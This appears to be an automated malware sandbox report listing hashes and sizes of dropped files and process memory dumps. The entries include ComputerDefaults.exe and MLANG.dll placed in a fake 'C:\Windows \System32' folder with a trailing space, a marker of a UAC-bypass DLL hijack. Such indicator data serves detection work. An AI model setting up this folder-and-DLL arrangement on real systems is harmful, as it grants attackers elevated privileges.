SHA17a7ace619fbd8569c2982fb1fc44aa4b6040f351
SHA2565baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde
SHA51203fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmwnxiws.z2n.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows \System32\ComputerDefaults.exeFilesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
C:\Windows \System32\MLANG.dllFilesize
122KB
MD5e286ada1af4b08fa4b7c78f862883c4e
SHA1798ebc7b7cd3db667f1a59ade299be4cff397f39
SHA25616eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3
SHA512fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5
-
memory/732-96-0x00000204BF730000-0x00000204BF744000-memory.dmpFilesize
80KB
-
memory/732-40-0x00007FF8A3230000-0x00007FF8A32EE000-memory.dmpFilesize
760KB
-
memory/732-39-0x00007FF8A4390000-0x00007FF8A4585000-memory.dmpFilesize
2.0MB
-
memory/736-139-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/784-137-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/1132-130-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/1332-129-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/1716-131-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/1832-133-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/1880-132-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/2000-138-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/2396-134-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/2404-135-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/3180-136-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/3424-128-0x00007FF864410000-0x00007FF864420000-memory.dmpFilesize
64KB
-
memory/3424-79-0x0000000002AE0000-0x0000000002B0A000-memory.dmpFilesize
168KB
-
memory/3984-16-0x00007FF8A4390000-0x00007FF8A4585000-memory.dmpFilesize
2.0MB
-
memory/3984-0-0x00007FF885C43000-0x00007FF885C45000-memory.dmpFilesize
8KB
-
memory/3984-17-0x00007FF8A3230000-0x00007FF8A32EE000-memory.dmpFilesize
760KB
-
memory/3984-15-0x0000029C37460000-0x0000029C37470000-memory.dmpFilesize
64KB
-
memory/3984-14-0x0000029C37770000-0x0000029C377E6000-memory.dmpFilesize
472KB
-
memory/3984-13-0x0000029C37490000-0x0000029C374D4000-memory.dmpFilesize
272KB
-
memory/3984-12-0x00007FF885C40000-0x00007FF886701000-memory.dmpFilesize
10.8MB
-
memory/3984-11-0x00007FF885C40000-0x00007FF886701000-memory.dmpFilesize
10.8MB
-
memory/3984-18-0x0000029C376F0000-0x0000029C3773C000-memory.dmpFilesize
304KB
-
memory/3984-10-0x0000029C372D0000-0x0000029C372F2000-memory.dmpFilesize
136KB